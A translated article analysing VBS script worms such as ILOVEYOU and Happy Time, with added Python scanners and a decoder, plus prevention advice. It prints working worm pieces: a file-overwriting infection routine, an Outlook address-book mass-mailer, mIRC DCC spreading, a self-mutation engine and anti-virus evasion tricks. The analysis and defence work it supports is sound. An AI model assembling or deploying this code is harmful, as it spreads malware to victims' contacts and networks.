Principle analysis and prevention of VBS script viruses

Source: Internet
Author: User
The popularity of the Internet has made the world a better place, but it has also brought grief. When you receive a message with the subject "I Love You", click on the attachment with a hand trembling with excitement, or browse a trusted web site and then find that every folder on your own machine opens slowly, do you realise that a virus has broken into your world? On 4 May 2000 the "Love Letter" network worm (ILOVEYOU) broke out in Europe and the United States. Because it spread through e-mail, it hit millions of computers around the world within a few days; many large corporate networks, including those of Microsoft and Intel, were paralysed, and global losses were estimated in the billions of dollars. Last year's new Happy Time virus likewise made life miserable for a great many computer users.
The most important feature these two viruses share is that both were written in VBScript. Love Letter and the new Happy Time virus are typical VBS script viruses, and one very important reason why VBS script viruses are so rampant is that they are easy to write. Below we analyse each aspect of the VBS script virus.

I. Characteristics and development of the VBS script virus
A VBS virus is written in VBScript. The scripting language is very powerful: it takes advantage of the openness of the Windows system and, by calling ready-made Windows objects and components, can control the file system and the registry directly. It is fair to say that a virus is an idea, and in VBS that idea is extremely easy to implement. VBS script viruses have the following characteristics:
1. Simple to write. Someone who knew nothing about viruses before can put together a new virus in a short time.
2. Great destructive power. The damage is not limited to the user's system files and system performance; such a virus can also crash mail servers and cause serious network congestion.
3. Strong infectivity. Because a script is interpreted directly, it does not have to deal with the complex PE file format the way a PE virus does: it can infect other files simply by copying itself, and error handling (On Error Resume Next) is trivial.
4. Wide spread. Such viruses can spread around the world in a very short time through HTM documents, e-mail attachments and other means.
5. Source code easy to obtain, many variants. Because a VBS virus is interpreted, its source is highly readable; even when the source has been encrypted, recovering it is relatively simple. This kind of virus therefore has many variants: slightly change the structure, or modify the bytes a signature matches on, and many anti-virus products are powerless.
6. Highly deceptive. To get a chance to run, a script virus uses all sorts of tricks to make the user less careful, for example giving the mail attachment a double suffix such as .jpg.vbs. Because the system hides known extensions by default, the user sees the file as a JPG picture.
7. Virus generators are easy to implement. A so-called virus production machine (virus generator) is a program that builds a virus according to the user's wishes. Most current virus generators are script virus generators, mainly because scripts are interpreted, which makes the generator very easy to implement; this is discussed later.
Because of these features, script viruses develop unusually quickly, and the appearance of virus generators in particular has made producing new script viruses very easy.

II. Analysis of the principle of the VBS script virus
1. How the VBS script virus infects and searches for files
The VBS script virus usually infects files directly by copying itself. Most of its code can be attached to other programs of the same kind: the new Happy Time virus, for example, appends its own code to .htm files and adds, at the top of the file, a statement that calls the virus code. Alternatively the virus generates a copy of the file, puts the virus code into it, and names the new file with the original file name as prefix and .vbs as suffix. Below we use part of the virus code to analyse the infection and search principle of this type of virus.
Key code for file infection (comments added; TargetFile is a File object found by the search code that follows):
Set fso = CreateObject("Scripting.FileSystemObject") ' create a file system object
Set self = fso.OpenTextFile(WScript.ScriptFullName, 1) ' open the current file (the virus itself) for reading
vbscopy = self.ReadAll ' read all of the virus code into the string variable vbscopy
...
Set ap = fso.OpenTextFile(TargetFile.Path, 2, True) ' open the target file for writing, ready to write the virus code
ap.Write vbscopy ' overwrite the target file with the virus code
ap.Close
Set cop = fso.GetFile(TargetFile.Path) ' get the target file
cop.Copy (TargetFile.Path & ".vbs") ' create another copy of the virus file, with a .vbs suffix
TargetFile.Delete (True) ' delete the target file
This describes how a virus file infects a normal file: the virus first assigns its own code to the string variable vbscopy, then overwrites the target file with that string, creates a copy of the file named with the original file name as prefix and .vbs as suffix, and finally deletes the original target file.
Below we analyse the file search code:
' This function finds files that meet the criteria and generates a virus copy for each of them.
Sub Scan(folder_) ' scan function definition
  On Error Resume Next ' skip any error directly, so that no error window pops up
  Set folder_ = fso.GetFolder(folder_)
  Set files = folder_.Files ' collection of all files in the current directory
  For Each file In files
    ext = fso.GetExtensionName(file) ' get the file name suffix
    ext = LCase(ext) ' convert the suffix to lower case
    If ext = "mp5" Then ' if the suffix is mp5, infect it (for experiments, create files with a suitable suffix, preferably an unusual one, so that normal programs are not damaged)
      WScript.Echo (file)
    End If
  Next
  Set subfolders = folder_.SubFolders
  For Each subfolder In subfolders ' search the other directories: recursive call
    Scan (subfolder)
  Next
End Sub
The code above is the file-search part of the VBS script virus. The Scan() function is concise and quite ingenious: it uses recursion to traverse all directories and files of an entire partition. Note that ext has been converted to lower case, so the literal it is compared with must also be lower case ("mp5"; an upper-case "MP5" would never match). In this listing the infection step has been replaced by WScript.Echo(file), which only prints the name of each matching file.
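As an added example (not part of the original article), here is a small Python scanner that walks a directory tree the way Scan() does, but from the defender's side: it flags the artefacts the infection routine above leaves behind (a file named <original>.<ext>.vbs, i.e. a double extension ending in a script suffix), scripts that contain every marker of the read-self/write-elsewhere pattern, and the Desktop.ini/Folder.htt pair discussed later in the article. The sample directory it builds is constructed here for illustration, and the marker list is an assumption for this example, not a signature from any product.

```python
import os
import re
import tempfile
from pathlib import Path

# Extensions the Windows Script Host runs on double-click.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}

# All four appear in the self-copying infection routine: open the running script
# by its own full name, read it all, open another file for writing. Assumed
# marker set for this example, not a vendor signature.
SELF_COPY_MARKERS = (
    re.compile(r"scripting\.filesystemobject", re.I),
    re.compile(r"wscript\.scriptfullname", re.I),
    re.compile(r"\.readall\b", re.I),
    re.compile(r"\.opentextfile\s*\(", re.I),
)


def is_double_extension(name):
    """True for Beauty.jpg.vbs-style names: a script suffix hiding behind a benign one."""
    suffixes = [s.lower() for s in Path(name).suffixes]
    return (len(suffixes) >= 2
            and suffixes[-1] in SCRIPT_EXTS
            and suffixes[-2] not in SCRIPT_EXTS)


def looks_like_self_copier(text):
    """True if every marker of the read-self / write-elsewhere pattern is present."""
    return all(m.search(text) for m in SELF_COPY_MARKERS)


def scan_tree(root):
    """Walk root recursively (like the virus's Scan()) and return (path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower = {f.lower() for f in files}
        # Desktop.ini + Folder.htt in one folder is the Active Desktop auto-run trigger.
        if "desktop.ini" in lower and "folder.htt" in lower:
            findings.append((os.path.join(dirpath, "folder.htt"), "desktop.ini/folder.htt pair"))
        for name in files:
            path = os.path.join(dirpath, name)
            if is_double_extension(name):
                findings.append((path, "double extension"))
            if Path(name).suffix.lower() in SCRIPT_EXTS:
                try:
                    with open(path, "r", errors="replace") as fh:
                        text = fh.read()
                except OSError:
                    continue
                if looks_like_self_copier(text):
                    findings.append((path, "self-copy pattern"))
    return findings


def build_sample_tree(root):
    """Constructed sample data (no real malware): a few files to exercise the scanner."""
    root = Path(root)
    docs = root / "docs"
    docs.mkdir(parents=True, exist_ok=True)
    # A harmless admin script: it uses FileSystemObject but never reads its own source.
    (docs / "cleanup.vbs").write_text(
        'Set fso = CreateObject("Scripting.FileSystemObject")\n'
        'fso.DeleteFile "C:\\Temp\\*.tmp"\n')
    # What the infection routine leaves behind: report.mp5 is gone and report.mp5.vbs
    # holds a script that opens itself by WScript.ScriptFullName and copies it onward.
    (docs / "report.mp5.vbs").write_text(
        'Set fso = CreateObject("Scripting.FileSystemObject")\n'
        'Set self = fso.OpenTextFile(WScript.ScriptFullName, 1)\n'
        'vbscopy = self.ReadAll\n')
    (docs / "Beauty.jpg").write_bytes(b"\xff\xd8\xff")  # a real picture name, no script suffix
    (root / "desktop.ini").write_text("[.ShellClassInfo]\n")
    (root / "folder.htt").write_text("<html><!-- customised folder view --></html>\n")
    return root


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    return scan_tree(build_sample_tree(tempfile.mkdtemp(prefix="vbs-scan-")))


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:28} {path}")
```

Running it reports three findings (the folder.htt pair, the double extension and the self-copy pattern of report.mp5.vbs). cleanup.vbs is not reported: using FileSystemObject on its own is not evidence of infection, and a scanner that treats it as such is exactly the kind of product the Execute trick in section 4 is aimed at.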

2. Ways in which the VBS script virus propagates over the network, with code analysis
The wide spread of the VBS script virus relies mainly on its network propagation functions. In general, a VBS script virus propagates in the following ways:
1) Through e-mail attachments
This is a very common way of spreading. The virus can obtain valid e-mail addresses in several ways; the most common is to take them directly from the Outlook address book, but it can also search the user's documents (HTM files, for example) for addresses.
Here is a concrete look at how a VBS script virus does this (comments added; the original fragment used FileSysObj and ShellObj without showing where they were created, so the two CreateObject lines at the top have been supplied):
Function MailBroadcast()
  On Error Resume Next
  Set FileSysObj = CreateObject("Scripting.FileSystemObject")
  Set ShellObj = CreateObject("WScript.Shell")
  Set OutlookApp = CreateObject("Outlook.Application") ' create an Outlook application object
  If OutlookApp = "Outlook" Then
    Set MapiObj = OutlookApp.GetNameSpace("MAPI") ' get the MAPI namespace
    Set AddrList = MapiObj.AddressLists ' get the address lists
    For Each Addr In AddrList
      If Addr.AddressEntries.Count <> 0 Then
        AddrEntCount = Addr.AddressEntries.Count ' number of entries in this address list
        For AddrEntIndex = 1 To AddrEntCount ' walk the e-mail addresses in the address list
          Set Item = OutlookApp.CreateItem(0) ' create a mail item
          Set AddrEnt = Addr.AddressEntries(AddrEntIndex) ' get one specific address
          Item.To = AddrEnt.Address ' fill in the recipient address
          Item.Subject = "Virus Propagation Experiment" ' write the message subject
          Item.Body = "This is a virus mail propagation test; if you receive this letter, please do not panic!" ' write the message body
          Set Attachments = Item.Attachments ' the mail attachment collection
          Attachments.Add FileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs" ' attach the virus file from the Windows directory
          Item.DeleteAfterSubmit = True ' delete the mail automatically after it has been sent
          If Item.To <> "" Then
            Item.Send ' send the mail
            ShellObj.RegWrite "HKCU\software\mailtest\mailed", "1" ' virus marker, to avoid mailing again
          End If
        Next
      End If
    Next
  End If
End Function
The marker under HKCU\software\mailtest\mailed is written here but never read: to be of any use it has to be checked before MailBroadcast is called, otherwise every run mails the whole address book again.

2) Through LAN shares
Spreading through LAN shares is also a very common and effective way of network propagation. Generally, to make sharing within a LAN convenient, there are many shared directories, and many of them are writable; in Windows 2000, for example, a newly created share is writable by default. The virus can therefore search for these shared directories and write its code into them.
VBS provides an object through which the shared folders in Network Places can be enumerated and operated on, and a virus can use this object to spread. The following script lists the current printer connections and network drive connections (comments added; vbCrLf replaces the undefined constant CRLF of the original listing, and Chr(9) is a tab):
welcome_msg = "Network connection search test"
Set WSHNetwork = WScript.CreateObject("WScript.Network") ' create a network object
Set oPrinters = WSHNetwork.EnumPrinterConnections ' collection of network printer connections
WScript.Echo "Network printer mappings:"
For i = 0 To oPrinters.Count - 1 Step 2 ' display the network printer connections (port, path pairs)
  WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i + 1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives ' collection of network drive connections
If colDrives.Count = 0 Then
  MsgBox "There are no drives to list.", vbInformation + vbOKOnly, welcome_msg
Else
  strMsg = "Current network drive connections:" & vbCrLf
  For i = 0 To colDrives.Count - 1 Step 2 ' the collection holds (drive letter, UNC path) pairs
    strMsg = strMsg & Chr(9) & Chr(9) & colDrives.Item(i) & Chr(9) & colDrives.Item(i + 1)
  Next
  MsgBox strMsg, vbInformation + vbOKOnly, welcome_msg ' show the current network drive connections
End If
The script above is complete: it finds the current printer connections and network drive connections and displays them. Once a shared connection is known, files can be read from and written to the target drive directly.

3) Through infection of HTM, ASP, JSP, PHP and other web documents
Today the WWW service is ubiquitous. A virus that infects HTM and similar files will infect the machine of every user who visits that web page.
The way a virus exercises its full functionality from an HTM file is the same one most malicious web page code uses: the code is basically the same as in a .vbs file, but it first has to obtain the objects on which such viruses depend, FSO and WSH, from within the page. Under HKEY_CLASSES_ROOT\CLSID\ in the registry you can find the key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, described as "Windows Script Host Shell Object", and likewise {0D43FE01-F093-11CF-8940-00A0C9054228}, described as "FileSystem Object". The page first initialises COM with these CLSIDs and obtains the corresponding component objects; only then can the virus use the FSO and WSH objects and call on their capabilities. The code looks like this (Kj_guest is an applet element in the page that lets the script create COM objects by CLSID):
Set AppleObject = document.applets("Kj_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance() ' create an instance
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance() ' create an instance
Set FSO = AppleObject.GetObject()
Other file types are not analysed here.

4) Through IRC chat channels
Viruses spreading through IRC generally use code like the following (mIRC as the example):
Dim mIRC
Set fso = CreateObject("Scripting.FileSystemObject")
Set mIRC = fso.CreateTextFile("C:\mirc\script.ini") ' create the file script.ini
fso.CopyFile WScript.ScriptFullName, "C:\mirc\attachment.vbs", True ' copy the virus file to attachment.vbs
mIRC.WriteLine "[script]"
mIRC.WriteLine "n0=on 1:join:*.*: { if ($nick != $me) { halt } /dcc send $nick C:\mirc\attachment.vbs }"
' the command /dcc send $nick attachment.vbs sends the virus file to every other user who joins the channel
mIRC.Close
The code above writes a single line of script into script.ini; real viruses write a good deal more. script.ini holds commands that control IRC sessions, and the commands in the file are executed automatically. For example, the "Tune.vbs" virus modifies c:\mirc\script.ini and c:\mirc\mirc.ini so that whenever an IRC user joins a channel in which an infected user is present, they receive tune.vbs by DCC. Likewise, if Pirch98 is installed in c:\pirch98 on the target machine, the virus modifies c:\pirch98\events.ini and c:\pirch98\pirch98.ini so that a user joining an infected channel receives tune.vbs by DCC.
A virus can also spread through the now widely used Kazaa. It copies its files into Kazaa's default shared directory, so that other users who browse that machine may download and execute the virus file. This method of propagation benefits from the popularity of Kazaa-style peer-to-peer file sharing.
There are other ways of spreading that are not listed here.


3. How the VBS script virus gains control
How does it gain control? This is an interesting topic, and VBS script viruses seem to play it to the fullest. Several typical methods are listed here:
1) Modifying registry keys
When Windows starts, it automatically loads the program held by each value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. A script virus can add a value pointing to the virus program under this key, so that it gains control every time the machine starts. Modifying the registry from VBS is simple: call the following method of the WScript.Shell object directly.
WshShell.RegWrite strName, anyValue [, strType]
2) Hijacking a file type's execution mapping
For example, the new Happy Time virus changes the handler for .dll files to WScript.exe. One can even point the EXE file type at virus code.
3) Deceiving the user into running the virus
This approach exploits user psychology. For example, when the virus sends an attachment it uses a double-suffix file name: because known suffixes are hidden by default, a VBS program named Beauty.jpg.vbs appears as Beauty.jpg, and users often click on it thinking it is a picture. Likewise, for files on the user's own disk, the virus infects them by producing a virus file named with the original file name as prefix and .vbs as suffix and deleting the original, so that the user may run the VBS file believing it to be the original file.
4) Desktop.ini and Folder.htt working together
These two files configure the Active Desktop and customise a folder. If a user's directory contains both, the virus code in Folder.htt is triggered as soon as the user opens the directory. This is a rather effective way of gaining control used by the new Happy Time virus. Folder.htt can also be used to trigger an EXE file, which may become another effective way for a virus to gain control.
There are many ways for a virus to gain control, and the author has plenty of room to play.

4. Techniques VBS script viruses use against anti-virus software
If a virus is to survive, the ability to fight anti-virus software is essential. In general, VBS script viruses use the following methods:
1) Self-encryption
The new Happy Time virus, for example, randomly chooses a key and encrypts part of its own code, so that the virus code differs in each infected file, achieving a polymorphic effect. This makes the traditional signature search harder. A virus can go further and use mutation techniques, so that even the decrypted virus code differs after each infection.
Here is a simple VBS script mutation engine (from Flyshadow; comments added, and the three garbled Chr() terms restored to match the fourth):
Randomize
Set of = CreateObject("Scripting.FileSystemObject") ' create a file system object
VC = of.OpenTextFile(WScript.ScriptFullName, 1).ReadAll ' read the script's own code
FS = Array("of", "VC", "FS", "FSC") ' the identifiers about to be replaced
For FSC = 0 To 3
  VC = Replace(VC, FS(FSC), Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65)) ' replace each name in the array with 4 random upper-case letters
Next
of.OpenTextFile(WScript.ScriptFullName, 2, True).WriteLine VC ' write the rewritten code back to the file
Each time this runs, the four names of, VC, FS and FSC in the VBS file are replaced with random strings, which largely defeats anti-virus software that relies on signature detection. Two things make the engine work: Replace is a plain, case-sensitive text substitution, so every occurrence of a name (including the one inside the Array literal, which is how the next run knows the new names) must be spelled with the same case, and the names must be chosen so that none of them occurs inside any other token of the script.
2) Clever use of the Execute function
Has anyone writing VBS programs found it strange that when an ordinary program uses the FileSystemObject object, some anti-virus software reports the VBS file as high risk when scanning it, whereas some VBS script viruses use FileSystemObject too and trigger no warning at all? The reason is simple: those viruses make clever use of the Execute method. Some anti-virus software detects VBS viruses by checking whether the program declares use of the FileSystemObject object, and raises an alarm if it does. If the virus turns that declaration into a string and runs it through the Execute(string) function, it evades such products.
3) Changing the way objects are declared
For example, Set fso = CreateObject("Scripting.FileSystemObject") is rewritten as
Set fso = CreateObject("script" + "Ing.filesyste" + "Mobject")
so that a static scan of the file does not find the string FileSystemObject. (ProgID lookup is case-insensitive, so the odd capitalisation makes no difference at run time.)
4) Shutting down anti-virus software directly
VBS scripts are powerful enough to enumerate the user's processes and compare the process names; if a process belongs to an anti-virus product, the virus terminates it directly and deletes some of its key programs.
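The tricks in 1) to 3) all defeat a scanner that looks for the literal text "Scripting.FileSystemObject" (or "RegWrite ... CurrentVersion\Run") in the file as stored. As an added example, not from the article, the following Python normaliser undoes them before matching: it tokenises the script so that quotes inside literals ("" escapes) and comments are handled correctly, folds Chr(n) calls into one-character literals, joins literals concatenated with & or +, and then scans the string argument of every Execute as source in its own right, recursively. The sample script is constructed for this example and is not a real virus; the signature list is illustrative, not a product's.

```python
import re

CHR_CALL = re.compile(r"Chr\s*\(\s*(\d+)\s*\)", re.I)
EXEC_TAIL = re.compile(r"\bExecute\s*\(?\s*$", re.I)

# Illustrative signatures, matched case-insensitively because VBScript names are.
SIGNATURES = {
    "FileSystemObject": re.compile(r"scripting\.filesystemobject", re.I),
    "WScript.Shell": re.compile(r"wscript\.shell", re.I),
    "Run key write": re.compile(r"regwrite\b.*currentversion\\run", re.I),
    "Execute of string": re.compile(r'\bexecute\s*\(?\s*"', re.I),
}


def tokenize(src):
    """Split source into ("lit", text) and ("code", text) tokens.
    A doubled quote inside a literal is one quote; Chr(n) outside a literal
    becomes a one-character literal; a comment is kept as code so that a quote
    inside it cannot open a literal."""
    tokens, i, n = [], 0, len(src)
    while i < n:
        ch = src[i]
        if ch == '"':
            j, buf = i + 1, []
            while j < n:
                if src[j] == '"':
                    if j + 1 < n and src[j + 1] == '"':
                        buf.append('"')
                        j += 2
                        continue
                    break
                buf.append(src[j])
                j += 1
            tokens.append(("lit", "".join(buf)))
            i = j + 1
        elif ch == "'":
            j = src.find("\n", i)
            j = n if j < 0 else j
            tokens.append(("code", src[i:j]))
            i = j
        else:
            m = CHR_CALL.match(src, i)
            if m and (i == 0 or not src[i - 1].isalnum()):
                tokens.append(("lit", chr(int(m.group(1)))))
                i = m.end()
            else:
                tokens.append(("code", ch))
                i += 1
    merged = []  # merge runs of single code characters into one token
    for kind, text in tokens:
        if kind == "code" and merged and merged[-1][0] == "code":
            merged[-1] = ("code", merged[-1][1] + text)
        else:
            merged.append((kind, text))
    return merged


def fold_concat(tokens):
    """Collapse lit, glue, lit into one lit, where glue is & or + with only spaces around it."""
    out = []
    for tok in tokens:
        out.append(tok)
        if (len(out) >= 3 and out[-1][0] == "lit" and out[-3][0] == "lit"
                and out[-2][0] == "code" and out[-2][1].strip() in ("&", "+")
                and "\n" not in out[-2][1]):
            out[-3:] = [("lit", out[-3][1] + out[-1][1])]
    return out


def render(tokens):
    return "".join('"' + t.replace('"', '""') + '"' if k == "lit" else t for k, t in tokens)


def normalize(src):
    """Source with Chr() calls and concatenations folded back into plain literals."""
    return render(fold_concat(tokenize(src)))


def naive_scan(src):
    """What a scanner that matches the raw file text sees."""
    return {name for name, pat in SIGNATURES.items() if pat.search(src)}


def deep_scan(src, depth=0):
    """Match on the normalised text, then scan every Execute "..." argument as source."""
    tokens = fold_concat(tokenize(src))
    hits = naive_scan(render(tokens))
    if depth < 8:  # Execute bodies can contain further Execute calls; bound the recursion
        for prev, cur in zip(tokens, tokens[1:]):
            if prev[0] == "code" and cur[0] == "lit" and EXEC_TAIL.search(prev[1]):
                hits |= deep_scan(cur[1], depth + 1)
    return hits


SAMPLE = r'''
' Constructed sample for this example, not a real virus: the three evasions in one script
Set fso = CreateObject("script" + "Ing.filesyste" + "Mobject")
Set sh = CreateObject("WScr" & Chr(105) & "pt.Shell")
Execute "Set f2 = CreateObject(""Scri"" & ""pting.FileSystemObject"")"
Execute "sh.RegWrite ""HKCU\Software\Microsoft\Windows\Current"" & ""Version\Run\svc"", ""C:\x.vbs"""
'''

if __name__ == "__main__":
    print("raw text  :", sorted(naive_scan(SAMPLE)))
    print("normalised:", sorted(deep_scan(SAMPLE)))
```

On the raw text only "Execute of string" fires; after normalisation all four signatures fire. The tokeniser matters: a regex that joins "..." & "..." directly on the file text would mis-pair the doubled quotes inside the Execute arguments and corrupt exactly the strings it needs to inspect.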

5. Principles of the VBS virus generator
A so-called virus production machine (virus generator) is software that produces virus source code directly according to the user's choices. This may seem incredible to many people, but for script viruses it is very simple to implement.
A scripting language is interpreted rather than compiled: the program needs no checksum or relocation, and each statement is clearly separated from the next. The virus can therefore be built from a number of independent modules; the user selects the virus functions, and the generator only has to put the corresponding functional modules together and finally perform the necessary code substitution and optimisation. For reasons of space, no details are given here.

III. How to prevent the VBS script virus
1. How to extract an (encrypted) script virus from a sample
An unencrypted script virus can be read directly from the sample. Here we look at how to extract an encrypted VBS script virus from a sample, taking the new Happy Time virus as the example.
Open Folder.htt with a text editor (the author used JediEdit). The file has only 93 lines in total. The first line is <body onload="vbscript:KJ_start()">; after a few lines of comments, lines 87 to 91 read as follows (the listing has been broken into one VBScript statement per line; the numeric constants of the two If tests and of the two Chr() calls did not survive extraction and are left empty here):
87: <script language=vbscript>
88: ExeString = "Afi Fkseboa) EQIIQBTQ) S^PQBTQ) AADOBAPFDJ) >MLIBL^GB'P) CPK ... ' the rest is omitted; it is very long
89: Execute("Dim KeyArr(3), ThisText" & vbCrLf & _
      "KeyArr(0) = 3" & vbCrLf & "KeyArr(1) = 3" & vbCrLf & "KeyArr(2) = 3" & vbCrLf & "KeyArr(3) = 4" & vbCrLf & _
      "For i = 1 To Len(ExeString)" & vbCrLf & _
      "TempNum = Asc(Mid(ExeString, i, 1))" & vbCrLf & _
      "If TempNum =  Then" & vbCrLf & "TempNum = " & vbCrLf & "End If" & vbCrLf & _
      "TempChar = Chr(TempNum + KeyArr(i Mod 4))" & vbCrLf & _
      "If TempChar = Chr( ) Then" & vbCrLf & "TempChar = vbCr" & vbCrLf & _
      "ElseIf TempChar = Chr( ) Then" & vbCrLf & "TempChar = vbLf" & vbCrLf & "End If" & vbCrLf & _
      "ThisText = ThisText & TempChar" & vbCrLf & "Next")
90: Execute(ThisText)
91: </script>
Lines 87 and 91 need no explanation. Line 88 assigns a string, which is clearly the encoded virus code. Look at the last piece of code in line 89, ThisText = ThisText & TempChar, together with the line that follows, and we can be fairly sure that ThisText is the decrypted virus code (readers familiar with VBS can also work through the decryption loop itself; it is very simple, and the conclusion is obvious even without reading it). Line 90 executes the code in ThisText, that is, the decrypted code.
So what do we do next? Very simply: once the virus code has been decrypted, write the contents of ThisText to a text file. Since the lines above are VBScript, create a new .txt file as follows. First copy lines 88 and 89 into it (if you want to see the effect of the new Happy Time virus you can also add line 90 at the end, but not on a machine you care about). Then add the VBS code that creates a file and writes ThisText into it, so that the whole file looks like this:
ExeString = "Afi ... ' line 88
Execute("Dim KeyArr ... ' line 89
Set fso = CreateObject("Scripting.FileSystemObject") ' create a file system object
Set VirusFile = fso.CreateTextFile("Resource.log", True) ' create a new file Resource.log to hold the decrypted virus code
VirusFile.WriteLine(ThisText) ' write the decrypted code to Resource.log
As simple as that. Save the file, change the suffix from .txt to .vbs (.vbe also works) and double-click it: a new file Resource.log appears in the directory. Open it, and what do you find? The source code of the new Happy Time virus.
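The decryption loop in line 89 is simple enough to reimplement outside the Windows Script Host, which is safer than running any part of the sample, even with line 90 removed. As an added example, not from the article, the following Python reproduces it. The key schedule KeyArr = (3, 3, 3, 4), indexed by i Mod 4 with i starting at 1, is taken from line 89; the numeric constants of the two If tests were lost in extraction, so the values used here for the space substitution and for the two characters that stand for vbCr and vbLf are assumptions, chosen so that a space in the ciphertext decodes to a space (which the fragment on line 88 requires). The encoder is the inverse, which the article does not show. With this key the start of the line 88 string, "Afi Fkseboa)", decodes to "Dim Inwhere,", which confirms the schedule.

```python
KEYARR = (3, 3, 3, 4)  # KeyArr(0..3) exactly as set in line 89

# The next three constants did not survive extraction and are ASSUMED for this
# example. SPACE_PRE makes a ciphertext space decode to a space at key-3
# positions; the two marks are the Chr() values the loop turns back into vbCr
# and vbLf. With these values "#" (key 3) and "$" (key 4) would also encode to
# a space and cannot round-trip; the sample text below avoids them.
SPACE_CIPHER, SPACE_PRE = 32, 29
CR_MARK, LF_MARK = 28, 29


def key_at(i):
    """Key for 1-based position i: KeyArr(i Mod 4), as in the VBScript loop."""
    return KEYARR[i % 4]


def decode(exestring):
    """Python transcription of the line-89 loop: returns ThisText."""
    out = []
    for i, ch in enumerate(exestring, start=1):
        num = ord(ch)
        if num == SPACE_CIPHER:         # If TempNum = ... Then TempNum = ...
            num = SPACE_PRE
        c = chr(num + key_at(i))        # TempChar = Chr(TempNum + KeyArr(i Mod 4))
        if c == chr(CR_MARK):           # If TempChar = Chr(...) Then TempChar = vbCr
            c = "\r"
        elif c == chr(LF_MARK):         # ElseIf TempChar = Chr(...) Then TempChar = vbLf
            c = "\n"
        out.append(c)
    return "".join(out)


def encode(plaintext):
    """Inverse of decode (not on the page): how a packer would produce ExeString."""
    out = []
    for i, ch in enumerate(plaintext, start=1):
        k = key_at(i)
        if ch == "\r":
            num = CR_MARK - k
        elif ch == "\n":
            num = LF_MARK - k
        else:
            num = ord(ch) - k
            if num == SPACE_PRE:        # decode maps 32 to 29 first, so 29 can be written as a space
                num = SPACE_CIPHER
        out.append(chr(num))
    return "".join(out)


# The start of the encoded string on line 88 of the sample, as printed in the article.
LINE88_FRAGMENT = "Afi Fkseboa)"

if __name__ == "__main__":
    print(decode(LINE88_FRAGMENT))
    # Constructed plaintext (not virus code) to show the round trip.
    code = 'Set fso = CreateObject("Scripting.FileSystemObject")\r\nWScript.Echo fso.GetSpecialFolder(0)\r\n'
    print(repr(encode(code)))
    print(decode(encode(code)) == code)
```

To apply it to a real sample, paste the full line 88 string into decode() and write the result to a file; nothing from the sample is executed, which is the advantage over the .vbs method above.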

2. Weaknesses of the VBS script virus
Because it is written as a script, the VBS script virus is not as self-contained and flexible as a PE file virus: it can only run if certain conditions are met (even though those conditions hold by default). The author believes that the VBS script virus has the following weaknesses:
1) Most VBS script viruses need one object in order to run: FileSystemObject.
2) VBScript code is interpreted and executed by the Windows Script Host.
3) A VBS script virus needs the support of its associated program, WScript.exe.
4) Spreading through web pages requires ActiveX support.
5) Spreading through e-mail needs the automatic mail-sending support of OE (Outlook Express), and most of these viruses use e-mail as their main mode of transmission.

3. How to prevent and remove the VBS script virus
Against the weaknesses listed above, the author proposes the following precautions:
1) Disable the file system object FileSystemObject.
Method: run the command regsvr32 scrrun.dll /u to unregister the file system object; regsvr32 is an executable in Windows\System. Alternatively, find the file scrrun.dll and delete or rename it. Another way is to find the key {0D43FE01-F093-11CF-8940-00A0C9054228} under HKEY_CLASSES_ROOT\CLSID\ in the registry and delete it.
2) Uninstall Windows Scripting Host.
On Windows 98 (and on NT 4.0 and later), open [Control Panel] → [Add/Remove Programs] → [Windows Setup] → [Accessories] and clear the "Windows Scripting Host" item.
As with the previous method, you can also find the key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} under HKEY_CLASSES_ROOT\CLSID\ in the registry and delete it.
3) Delete the mappings between the VBS, VBE, JS and JSE file suffixes and their applications.
Click [My Computer] → [View] → [Folder Options] → [File Types], and delete the mappings for the VBS, VBE, JS and JSE suffixes.
4) In the Windows directory, find WScript.exe and rename or delete it. If you think you may need it later, renaming is the better choice; you can of course also reinstall it.
5) To block VBS network worms completely, you also need to configure your browser. Open the browser, go to the Security tab of Internet Options and click the [Custom Level] button, then disable all ActiveX controls and plug-ins. If, for instance, the new Happy Time virus cannot run its ActiveX component, its web-based propagation is finished.
6) Disable the automatic mail-receiving function of OE.
7) Because most worms play tricks with file extensions, do not let the system hide the extensions of known file types. Windows defaults to "Hide file extensions for known file types"; change the setting so that the extensions of all file types are shown.
8) Set the security level of the system's network connections to at least "Medium"; this prevents, to some extent, harmful Java programs and ActiveX components from getting into the computer.
9) Finally, something everybody should know: anti-virus software really is necessary. Some anti-virus products have disappointed many users, but the choice is up to you. With viruses flying across the network like this, a machine without anti-virus software is, in my view, quite incredible.

IV. Prospects for the development of script viruses
With the rapid development of the network, network worms are becoming popular, and the VBS script worm stands out, both in numbers and in power. Because script viruses are simple to write, there will be more and more other script viruses, in PHP, JS, Perl and so on, in addition to the VBS script viruses that are currently in vogue.
But scripting is not the best tool for the serious virus writer: script viruses are easier to write, but also relatively easy to guard against. The author believes that script viruses will continue to be common, but only a few script worms will have an impact comparable to Love Letter or the new Happy Time.
